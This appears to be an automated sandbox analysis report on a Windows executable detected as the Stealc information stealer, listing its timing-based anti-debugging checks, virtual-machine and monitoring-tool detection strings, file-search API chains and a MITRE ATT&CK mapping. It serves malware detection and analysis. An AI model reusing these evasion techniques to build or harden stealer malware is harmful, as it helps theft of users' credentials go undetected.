                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CDC0 second address: 147CDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CDC4 second address: 147CDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CDD2 second address: 147CDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8F347F9F16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CEEF second address: 147CF1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B69h 0x00000009 pop edx 0x0000000a pushad 0x0000000b js 00007F8F34B47B56h 0x00000011 jnl 00007F8F34B47B56h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D07E second address: 147D0A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D0A1 second address: 147D0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D0A7 second address: 147D0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D0B0 second address: 147D0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B5Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1492F4E second address: 1492F64 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8F347F9F16h 0x00000008 jng 00007F8F347F9F16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1492F64 second address: 1492F70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F8F34B47B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1495F47 second address: 1495F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149BE27 second address: 149BE44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007F8F34B47B56h 0x0000000c jmp 00007F8F34B47B5Ch 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149BE44 second address: 149BE60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F28h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149BC41 second address: 149BC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8F34B47B56h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149D4DB second address: 149D4F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F8F347F9F1Bh 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149D4F0 second address: 149D4FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8F34B47B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149FA4E second address: 149FA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149FA52 second address: 149FA62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8F34B47B56h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6356 second address: 14A6360 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8F347F9F1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A65F3 second address: 14A65FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A65FB second address: 14A6601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6601 second address: 14A6605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6605 second address: 14A6621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6B8F second address: 14A6B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6B93 second address: 14A6B9D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8F347F9F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6B9D second address: 14A6BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC5FC second address: 14AC614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F8F347F9F22h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC78D second address: 14AC7C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8F34B47B69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007F8F34B47B63h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC7C4 second address: 14AC7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C41BD second address: 14C41C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C41C1 second address: 14C41D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8F347F9F1Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D812E second address: 14D8157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8F34B47B5Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8F34B47B61h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D7085 second address: 14D708D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D7355 second address: 14D7359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D7359 second address: 14D735D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D735D second address: 14D7369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8F34B47B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D7369 second address: 14D736F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D736F second address: 14D738C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B69h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D738C second address: 14D7390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D7882 second address: 14D7888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D7E49 second address: 14D7E63 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8F347F9F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8F347F9F1Dh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D7E63 second address: 14D7E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D9904 second address: 14D9930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F8F347F9F16h 0x0000000b jc 00007F8F347F9F16h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8F347F9F28h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D9930 second address: 14D9942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B5Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D9774 second address: 14D9778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D9778 second address: 14D977C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DD9A1 second address: 14DD9A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DDA85 second address: 14DDABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8F34B47B67h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14DDABB second address: 14DDAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562026B second address: 5620270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620270 second address: 56202A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F25h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 mov dh, cl 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F8F347F9F1Ah 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56202A7 second address: 56202B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8F34B47B5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56202EA second address: 5620311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F8F347F9F24h 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebp 0x0000000e pushad 0x0000000f mov si, CAE3h 0x00000013 pushad 0x00000014 mov edx, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620311 second address: 5620333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 pushad 0x0000000a jmp 00007F8F34B47B5Ch 0x0000000f push esi 0x00000010 mov eax, edx 0x00000012 pop ebx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov al, FBh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620333 second address: 5620383 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8F347F9F21h 0x00000008 and si, D746h 0x0000000d jmp 00007F8F347F9F21h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F8F347F9F1Eh 0x0000001d sub ecx, 0A14B3E8h 0x00000023 jmp 00007F8F347F9F1Bh 0x00000028 popfd 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14056E3 second address: 14056E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14056E7 second address: 14056ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13F83A9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13F6B21 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 125191F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1481F7C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01004910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_01004910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_010038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FFDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01004570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_01004570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FFE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FFED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FF16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FFF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FFBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FFDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01003EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_01003EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF1160 GetSystemInfo,ExitProcess,0_2_00FF1160
                Source: file.exe, file.exe, 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2169132039.00000000019EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
                Source: file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware>
                Source: file.exe, 00000000.00000002.2169132039.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2169132039.00000000019EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13414
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13359
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13362
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13382
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13374
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF45C0 VirtualProtect ?,00000004,00000100,000000000_2_00FF45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01009860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01009860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01009750 mov eax, dword ptr fs:[00000030h]0_2_01009750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01007850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_01007850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6200, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01009600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_01009600
                Source: file.exe, file.exe, 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: MProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_01007B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01006920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_01006920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01007850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_01007850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01007A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_01007A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6200, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6200, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
